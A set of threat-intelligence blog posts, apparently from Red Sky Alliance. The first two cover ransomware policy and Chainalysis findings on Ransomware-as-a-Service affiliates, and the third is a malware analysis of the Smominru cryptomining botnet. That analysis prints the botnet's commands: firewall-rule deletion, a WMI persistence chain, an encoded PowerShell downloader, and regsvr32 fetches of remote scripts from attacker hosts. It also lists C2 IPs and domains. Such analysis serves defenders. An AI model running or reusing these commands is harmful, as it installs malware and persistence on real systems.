<li>Building an insurance-sector consortium to share ransomware loss data.</li>
</ul>
<p>The task force also says much more needs to be done to disrupt the infrastructure that cybercriminals use to support their malicious activities. It calls on Congress to update the <a href="https://www.law.cornell.edu/uscode/text/18/1030">Computer Fraud and Abuse Act</a> so that infrastructure providers will be encouraged to report criminal activity.</p>
<p>"If a hosting company is made aware that a customer is conducting attacks from one of the hosting company’s servers, they can typically shut down the customer's service due to a violation of the company’s terms of service," the report notes. "In a less clear scenario, if a telecommunications company is provided a signature that identifies malicious network traffic and they block the traffic from transiting their network, thereby disrupting the malicious activity, the company may have some legal liability."</p>
<p>Recently, the U.S. Department of Justice started its own Ransomware and Digital Extortion Task Force to target the "ransomware criminal ecosystem.” DHS Secretary <a href="https://www.dhs.gov/news/2021/03/31/secretary-mayorkas-outlines-his-vision-cybersecurity-resilience">Mayorkas</a> also announced in March that the agency would conduct a 60-day "sprint" exercise focused on battling ransomware.</p>
<p>Red Sky Alliance has been has analyzing and documenting cyber threats for 9 years and maintains a resource library of malware and cyber actor reports available at <a href="https://redskyalliance.org">https://redskyalliance.org</a> at no charge.</p>
<p> </p>
<p>What can you do to better protect your organization today?</p>
<p> </p>
<ul>
<li>All data in transmission and at rest should be encrypted.</li>
<li>Proper data back-up and off-site storage policies should be adopted and followed.</li>
<li>Implement 2-Factor authentication-company wide.</li>
<li>For USA readers, join and become active in your local Infragard chapter, there is no charge for membership. <a href="http://www.infragard.org">infragard.org</a></li>
<li>Update disaster recovery plans and emergency procedures with cyber threat recovery procedures. And test them.</li>
<li>Institute cyber threat and phishing training for all employees, with testing and updating.</li>
<li>Recommend/require cyber security software, services and devices to be used by all at home working employees and consultants.</li>
<li>Review and update your cyber threat and information security policies and procedures. Make them a part of all emergency planning and training.</li>
<li>Ensure that all software updates and patches are installed immediately.</li>
<li>Enroll your company/organization in RedXray for daily cyber threat notifications are directed at your domains. RedXray service is $500 a month and provides threat intelligence on nine (9) cyber threat categories including Keyloggers, with having to connect to your network.</li>
<li>Purchase annual cyber insurance coverage from Red Sky Alliance provided by Cysurance.</li>
</ul>
<p> </p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a>.</p>
<p><strong> </strong></p>
<p><strong>Reporting: </strong><a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p><strong>Website: </strong><a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a></p>
<p><strong>LinkedIn: </strong><a href="https://www.linkedin.com/company/wapacklabs/">https://www.linkedin.com/company/wapacklabs/</a></p>
<p><strong>Twitter: </strong><a href="https://twitter.com/wapacklabs?lang=en">https://twitter.com/wapacklabs?lang=en</a></p>
<p><strong>Weekly Cyber Intelligence Briefings: </strong></p>
<p><a href="https://attendee.gotowebinar.com/register/8782169210544615949">https://attendee.gotowebinar.com/register/8782169210544615949</a></p>
<p> </p>
<p><a href="{{#staticFileLink}}8959864256,original{{/staticFileLink}}">TR-21-142-001_Crypto.pdf</a></p>
<p> </p>
<p><span style="font-size:8pt;"><a href="https://www.bankinfosecurity.com/fighting-ransomware-call-for-cryptocurrency-regulation-a-16493?rf=2021-05-01__SUB_BIS__Slot1_ART16493&mkt_tok=MDUxLVpYSS0yMzcAAAF8xzX1dbUCS3ZNJ4Ry_xV7FJIKHIajke7WXhqs-hPHd-cMo0cnPDNlixMs3B85KCEfGygDUN7ajeu9RKQeULS-psnRHWpAAi9SBj7zWyhnmrGCeaY">https://www.bankinfosecurity.com/fighting-ransomware-call-for-cryptocurrency-regulation-a-16493?rf=2021-05-01__SUB_BIS__Slot1_ART16493&mkt_tok=MDUxLVpYSS0yMzcAAAF8xzX1dbUCS3ZNJ4Ry_xV7FJIKHIajke7WXhqs-hPHd-cMo0cnPDNlixMs3B85KCEfGygDUN7ajeu9RKQeULS-psnRHWpAAi9SBj7zWyhnmrGCeaY</a></span></p></div>Ransomware-as-a-Service went to Business Schoolhttps://redskyalliance.org/xindustry/ransomware-as-a-service-went-to-business-school2021-02-08T17:28:26.000Z2021-02-08T17:28:26.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><a href="{{#staticFileLink}}8532841253,original{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8532841253,RESIZE_400x{{/staticFileLink}}" width="250" alt="8532841253?profile=RESIZE_400x" /></a>A report published today by blockchain investigations firm Chainalysis confirms that cybercrime groups engaging in ransomware attacks don't operate in their own bubbles but often switch ransomware suppliers (RaaS services) in a search for better profits. The report analyzed how Bitcoin funds were transferred from victims to criminal groups, and how the money was divided among different parties involved in the ransomware attack, and how it was eventually laundered.</p>
<p>In today’s world, the ransomware landscape is very similar to how modern businesses operate. There are coders who create and rent the actual ransomware strain via services called RaaS or Ransomware-as-a-Service similar to how most modern software is provided today. Often, RaaS operators rent their ransomware to anyone who signs up, while others prefer to work with small groups of verified clients, which are usually called "affiliates." The affiliates are the actors who usually spread the ransomware via email or orchestrate intrusions into corporate or government networks, which they later infect and encrypt with the ransomware they rented from the RaaS operator.</p>
<p>In some cases, the affiliates are also multiple actor groups themselves. Affiliate groups specialize in breaching a company's network perimeter, and are called initial access vendors, while other groups are specialized in expanding this initial access inside hacked networks to maximize the ransomware's damage.</p>
<p>The ransomware landscape has evolved from previous years and is now a collection of multiple criminal groups, each providing its own highly-specialized service to one another, often across different RaaS providers.</p>
<p>The <a href="https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer">Chainalysis report</a> confirms these informal theories with undisputable and unforgeable cryptographic proof left behind by the Bitcoin transactions that have taken place among some of these groups. Chainalysis said it found evidence to suggest that an affiliate for the now-defunct Maze RaaS was also involved with SunCrypt RaaS. "We see that the Maze affiliate also sent funds roughly 9.55 Bitcoin worth over $90,000 via an intermediary wallet to an address labeled 'Suspected SunCryptadmin,' which we've identified as part of a wallet that has consolidated funds related to a few different SunCrypt attacks," Chainalysis said.</p>
<p>"This suggests that the Maze affiliate is also an affiliate for SunCrypt, or possibly involved with SunCrypt in another way."</p>
<p>Similar findings also show a connection between the Egregor and DoppelPaymer operations. "In this case, we see that an Egregor wallet sent roughly 78.9 BTC worth approximately $850,000 to a suspected Doppelpaymer administrator wallet," researchers said. "Though we can't know for sure, we believe that this is another example of affiliate overlap. Our hypothesis is that the Egregor-labeled wallet is an affiliate for both strains sending funds to the Doppelpaymer administrators."</p>
<p>Chainalysis researchers also found evidence that the operators of the Maze and Egregor operations also used the same money-laundering service and over-the-counter brokers to convert stolen funds into fiat currency.</p>
<p>Since several security firms have suggested that the Egregor RaaS is a rebrand and continuation of the older and defunct Maze operation, such findings come to support these theories, showing how old Maze tactics permeated to the new Egregor operation. "Interesting report and very much aligns with what we are seeing," <a href="https://twitter.com/uuallan">Allan Liska</a>, a security researcher with threat intelligence firm Recorded Future, told ZDNet.</p>
<p>"Recorded Future is seeing more fluidity in the RaaS market now than at any other time in the (admittedly short) history of the RaaS market. "Part of this is because of the reality that there is a growing stratification between the haves and have nots in ransomware. There are fewer actors making a lot of money, so ransomware actors are jumping from one RaaS to another to improve their chances of success," the Recorded Future analyst said. Liska says there are other connections and overlaps between other RaaS groups, and not just Maze, SunCrypt, and Egregor.</p>
<p>The Recorded Future analyst pointed to the Sodinokibi (aka REvil) RaaS operation as being one of the services where many groups overlap, primarily because the Sodinokibi administrator, an individual going by the name of Unknown, has often actively and openly recruited affiliates from other RaaS programs.<strong> </strong>But while we might view these connections and overlaps as a sign of successful cooperation between cybercrime groups, Chainalysis believes that this interconnectedness is actually a good sign for law enforcement.<strong> </strong>"The evidence suggests that the ransomware world is smaller than one may initially think given the number of unique strains currently operating," Chainalysis said.</p>
<p>In theory, should make cracking down and disrupting ransomware attacks a much easier task since a carefully planned blow could impact multiple groups and RaaS providers at the same time. According to Chainalysis, these weak spots are the money-laundering and over-the-counter services that RaaS operators and their affiliates often use to convert their stolen funds into legitimate currency.</p>
<p>By taking out legitimate avenues for converting funds and reaching real-world profitability, Chainalysis believes RaaS operations would have a hard time seeing a reason to operate when they can't profit from their work.</p>
<p>Red Sky Alliance has been has analyzing and documenting cyber threats for 9 years and maintains a resource library of malware and cyber actor reports available at <a href="https://redskyalliance.org">https://redskyalliance.org</a> at no charge.</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or feedback@wapacklabs.com.</p>
<p> </p>
<p><strong>Reporting: </strong><a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p><strong>Website: </strong><a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a></p>
<p><strong>LinkedIn: </strong><a href="https://www.linkedin.com/company/wapacklabs/">https://www.linkedin.com/company/wapacklabs/</a></p>
<p><strong>Twitter: </strong><a href="https://twitter.com/wapacklabs?lang=en">https://twitter.com/wapacklabs?lang=en</a></p>
<p><strong>Weekly Cyber Intelligence Briefings: </strong></p>
<p><a href="https://attendee.gotowebinar.com/register/8782169210544615949">https://attendee.gotowebinar.com/register/8782169210544615949</a></p>
<p> </p>
<p><a href="{{#staticFileLink}}8532841283,original{{/staticFileLink}}">TR-21-039-001_RaaS.pdf</a> </p>
<p> </p></div>Smominru Botnethttps://redskyalliance.org/xindustry/smominru-botnet2019-04-03T18:14:36.000Z2019-04-03T18:14:36.000ZScott Hallhttps://redskyalliance.org/members/Scott<div><p><strong>Summary</strong></p><p>Beginning in August of 2017, a new cryptocurrency mining botnet, dubbed Smominru, started propagating via the recently leaked Eternal Blue exploit. Smominru, aka MyKings, is characterized by the targeting of Windows systems using WMI as a file-less persistence mechanism.<a rel="nofollow" href="#_ftn1" name="_ftnref1" id="_ftnref1">[1]</a></p><p>As of March 2019, Smominru showed no signs of slowing down. Wapack Labs has identified approximately 316K victims connecting to Smominru infrastructure over a period of 6 days. This report provides a high-level overview on the malware installation as well as details on the Smominru infrastructure and botnet.</p><p><strong>Details</strong></p><p>After the leak of NSA developed exploits in 2017, several attackers incorporated them into malware campaigns. One of these came to be known as Smominru, a self-propagating botnet intended primarily for cryptocurrency mining. Smominru uses the Eternal Blue exploit<a rel="nofollow" href="#_ftn2" name="_ftnref2" id="_ftnref2">[2]</a> to infect systems and install a WMI payload. This payload triggers a number of additional commands and payload downloads including the cryptocurrency miner as well as Mimikatz, a popular info stealer malware.</p><p><a href="{{#staticFileLink}}1757704822,RESIZE_1200x{{/staticFileLink}}" target="_blank" rel="noopener"><img class="align-center" src="{{#staticFileLink}}1757704822,RESIZE_710x{{/staticFileLink}}" width="710"/></a></p><p>Along with the WMI payload, Smominru then executes a large number of commands on the victim in order to prep the system. Among these are commands for killing processes and services, changing access rights and reconfiguring the firewall. <a rel="nofollow" href="#_ftn1" name="_ftnref1" id="_ftnref1">[1]</a> Example commands:</p><table><tbody><tr><td width="623"><p>taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe…</p><p> </p><p>netsh advfirewall firewall delete rule name="tcp all" dir=in</p><p>netsh advfirewall firewall delete rule name="deny tcp 445" dir=in</p><p>netsh advfirewall firewall delete rule name="deny tcp 139" dir=in</p><p>netsh advfirewall firewall delete rule name="tcpall" dir=out</p><p> </p><p>cacls C:\Windows\debug\WIA\*.exe /e /d everyone&cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d everyone&cacls C:\Users\administrator\AppData\Roaming\Tempo /e /d everyone&cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d system&cacls C:\Users\Default\AppData\Roaming\Tempo\*.exe</p></td></tr></tbody></table><p> </p><p>The malware uses the WMI console commands (WMIC) to trigger additional downloads.</p><p> </p><table><tbody><tr><td width="623"><p>wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc \"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA==\"&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:<a rel="nofollow" href="http://wmi.1217bye.host/1.txt">http://wmi.1217bye.host/1.txt</a> scrobj.dll&regsvr32 /u /s /i:<a rel="nofollow" href="http://173.208.139.170/2.txt">http://173.208.139.170/2.txt</a> scrobj.dll&regsvr32 /u /s /i:<a rel="nofollow" href="http://35.182.171.137/3.txt">http://35.182.171.137/3.txt</a> scrobj.dll"&wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckyoumm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckyoumm4\""</p></td></tr></tbody></table><p> </p><p>This also achieves persistence via configuration of an event filter named ‘fuckyoumm3’, which runs every 10800 seconds. This is also a convenient way for the attacker to install additional malware on all of the bots since they can switch out the hosted files. The Monero mining malware is finally installed, makes a connection to pool.minexmr.com to retrieve its configuration and begin mining.</p><p><strong>Infrastructure</strong></p><p>Smominru has used a number of different endpoints since it emerged in 2017. Its current network consists of a handful of IP addresses and domains. Most of the known domains share the same registrant email: billkillmenow@gmail.com. Domains use the same loose naming convention consisting of a combination of words and numbers. A couple domains use the string ‘mykings’ which is an alias name for Smominru. The domains use the Reg.ru registrar as well as the following state and country configurations:</p><p><strong>Registrant State/Province: msk</strong></p><p><strong>Registrant Country: BF</strong></p><p> </p><p>Several other domains use a registrant email address ira.malikova78@mail.ru. The Smominru actors tried to obfuscate this email by using Whois protection services however, it was identified by examining historic Whois records prior to the Whois protection.</p><p>The following is an example Whois record:</p><table><tbody><tr><td width="623"><p>Domain Name: 1217BYE.HOST</p><p>Registry Domain ID: D87766657-CNIC</p><p>Registrar WHOIS Server: whois.reg.ru</p><p>Registrar URL: <a rel="nofollow" href="https://www.reg.ru/">https://www.reg.ru/</a></p><p>Updated Date: 2018-12-21T17:13:05.0Z</p><p>Creation Date: 2018-12-16T17:08:54.0Z</p><p>Registry Expiry Date: 2019-12-16T23:59:59.0Z</p><p>Registrar: Registrar of Domain Names REG.RU, LLC</p><p>Registrar IANA ID: 1606</p><p>Domain Status: ok <a rel="nofollow" href="https://icann.org/epp#ok">https://icann.org/epp#ok</a></p><p>Registrant Organization:</p><p>Registrant State/Province: msk</p><p>Registrant Country: BF</p><p>Registrant Phone: +7.4957654321</p><p>Registrant Email: billkillmenow@gmail.com</p><p>Admin Phone: +7.4957654321</p><p>Admin Email: billkillmenow@gmail.com</p><p>Tech Phone: +7.4957654321</p><p>Tech Email: billkillmenow@gmail.com</p><p>Name Server: NS1.REG.RU</p><p>Name Server: NS2.REG.RU</p><p>DNSSEC: unsigned</p><p>Billing Phone: +7.4957654321</p><p>Billing Email: billkillmenow@gmail.com</p><p>Registrar Abuse Contact Email: abuse@reg.ru</p><p>Registrar Abuse Contact Phone: +7.4955801111</p><p>URL of the ICANN Whois Inaccuracy Complaint Form: <a rel="nofollow" href="https://www.icann.org/wicf/">https://www.icann.org/wicf/</a></p><p>>>> Last update of WHOIS database: 2019-03-25T16:38:02.0Z <<<</p></td></tr></tbody></table><p> </p><p>The following table lists domains that are currently registered by Smominru actors.</p><p> </p><table width="582"><tbody><tr><td width="135"><p>VALUE</p></td><td width="129"><p>Created</p></td><td width="318"><p>Registration info</p></td></tr><tr><td width="135"><p>1217bye.host</p></td><td width="129"> 2018-12-16</td><td width="318"><p>billkillmenow@gmail.com</p></td></tr><tr><td width="135"><p>1226bye.pw</p></td><td width="129"> 2018-12-26</td><td width="318"><p>billkillmenow@gmail.com</p></td></tr><tr><td width="135"><p>1226bye.xyz</p></td><td width="129"> 2018-12-25</td><td width="318"><p>billkillmenow@gmail.com</p></td></tr><tr><td width="135"><p>5b6b7b.info</p></td><td width="129"> 2017-01-21</td><td width="318"><p>billkillmenow@gmail.com</p></td></tr><tr><td width="135"><p>down0116.info</p></td><td width="129"> 2018-01-16</td><td width="318"><p>billkillmenow@gmail.com</p></td></tr><tr><td width="135"><p>ftp0118.info</p></td><td width="129"> 2018-01-18</td><td width="318"><p>billkillmenow@gmail.com</p></td></tr><tr><td width="135"><p>ftp0930.host</p></td><td width="129"> 2018-09-30</td><td width="318"><p>billkillmenow@gmail.com</p></td></tr><tr><td width="135"><p>ms1128.site</p></td><td width="129"> 2018-11-28</td><td width="318"><p>billkillmenow@gmail.com</p></td></tr><tr><td width="135"><p>mykings.pw</p></td><td width="129"><p> 2018-04-11</p></td><td width="318"><p>Protected Whois. Initially observed registrant: ira.malikova78@mail.ru</p></td></tr><tr><td width="135"><p>mykings.xyz</p></td><td width="129"><p> </p></td><td width="318"><p>sinkholed</p></td></tr><tr><td width="135"><p>mys2018.xyz</p></td><td width="129"> 2018-03-23</td><td width="318"><p>Registrant State/Province: msk</p><p>Registrant Country: BF</p><p>Reg.ru</p></td></tr><tr><td width="135"><p>pc0416.xyz</p></td><td width="129"> 2018-04-16</td><td width="318"><p>Registrar URL: <a rel="nofollow" href="http://www.reg.com">http://www.reg.com</a></p><p> </p><p>Registrant State/Province: msk</p><p>Registrant Country: BF</p></td></tr><tr><td width="135"><p>wpd0126.info</p></td><td width="129"> </td><td width="318"><p>Registrant State/Province: msk</p><p>Registrant Country: BF</p><p>Reg.ru</p></td></tr><tr><td width="135"><p>upme0611.info</p></td><td width="129"> 2018-06-10</td><td width="318"><p>Registrant State/Province: msk</p><p>Registrant Country: BF</p><p>Reg.ru</p></td></tr><tr><td width="135"><p>649183ca17.pw</p></td><td width="129"><p>2018-09-03</p> </td><td width="318"><p>ira.malikova78@mail.ru</p><p> </p></td></tr><tr><td width="135"><p>8e627797f3.pw</p></td><td width="129"><p>2018-09-03</p> </td><td width="318"><p>ira.malikova78@mail.ru</p><p> </p></td></tr></tbody></table><p> </p><p>Wapack Labs identified 10 IP addresses currently being leveraged for Smominru’s command and control infrastructure. IP address 174.128.230.162, which is currently being leveraged for 2<sup>nd</sup> stage downloads, was by far the most frequently observed with close to 300K unique IPs connecting.</p><table width="396"><tbody><tr><td width="258"><p><strong>Smominru C2 IP</strong></p></td><td width="138"><p><strong>Botnet Hits</strong></p></td></tr><tr><td width="258"><p>174.128.230.162</p></td><td width="138"><p>295230</p></td></tr><tr><td width="258"><p>45.58.135.106</p></td><td width="138"><p>69871</p></td></tr><tr><td width="258"><p>174.128.239.250</p></td><td width="138"><p>21202</p></td></tr><tr><td width="258"><p>66.117.6.174</p></td><td width="138"><p>1313</p></td></tr><tr><td width="258"><p>35.182.171.137</p></td><td width="138"><p>1107</p></td></tr><tr><td width="258"><p>64.32.3.186</p></td><td width="138"><p>1094</p></td></tr><tr><td width="258"><p>185.112.156.92</p></td><td width="138"><p>1088</p></td></tr><tr><td width="258"><p>223.25.247.240</p></td><td width="138"><p>511</p></td></tr><tr><td width="258"><p>173.208.139.170</p></td><td width="138"><p>353</p></td></tr><tr><td width="258"><p>208.110.71.194</p></td><td width="138"><p>316</p></td></tr></tbody></table><p> </p><p> </p><p><strong>Botnet</strong></p><p>Wapack Labs analyzed traffic going to Smominru infrastructure over the course of 6 days and identified 316K unique IPs that are likely compromised with the Smominru coinminer. The vast majority were AS4134 No.31, Jin-rong Street which is the top botnet ASN across the board.</p><p><a href="{{#staticFileLink}}1757720157,RESIZE_710x{{/staticFileLink}}" target="_blank" rel="noopener"><img class="align-center" src="{{#staticFileLink}}1757720157,RESIZE_710x{{/staticFileLink}}" width="604"/></a></p><p> </p><p> </p><p>The geolocation of Smominru bots, revealed China and Russia to be the top two origins, with roughly the same number of bots each. Figure 3. shows the breakdown of bots by country.</p><p><a href="{{#staticFileLink}}1757723126,RESIZE_710x{{/staticFileLink}}" target="_blank" rel="noopener"><img class="align-center" src="{{#staticFileLink}}1757723126,RESIZE_710x{{/staticFileLink}}" width="438"/></a></p><p> </p><p> </p><p><strong>Conclusion</strong></p><p> </p><p>Cryptocurrency mining botnets such a Smominru are especially problematic because not only can they lead to data loss, they also consume most of the processing power on an infected system. This also leads to more power consumption and greatly degrades the performance of the infected machine. Despite emergency patches issued by Microsoft, millions of systems still remained vulnerable to Eternal Blue, as of late 2018. So long as machines are unpatched, they are at risk of being recruited by Smominru.</p><p><a rel="nofollow" href="#_ftnref1" name="_ftn1" id="_ftn1">[1]</a> <a rel="nofollow" href="https://www.virustotal.com/#/file/85aded78821dafa60971ce19201bea3f34bbadb64b81ef882b406f8312abfa4a/detection">https://www.virustotal.com/#/file/85aded78821dafa60971ce19201bea3f34bbadb64b81ef882b406f8312abfa4a/detection</a></p><p> </p><p><a rel="nofollow" href="#_ftnref1" name="_ftn1" id="_ftn1">[1]</a> <a rel="nofollow" href="https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-uses-wmi-eternalblue-spread-filelessly/">https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-uses-wmi-eternalblue-spread-filelessly/</a></p><p><a rel="nofollow" href="#_ftnref2" name="_ftn2" id="_ftn2">[2]</a> <a rel="nofollow" href="https://en.wikipedia.org/wiki/EternalBlue">https://en.wikipedia.org/wiki/EternalBlue</a></p></div>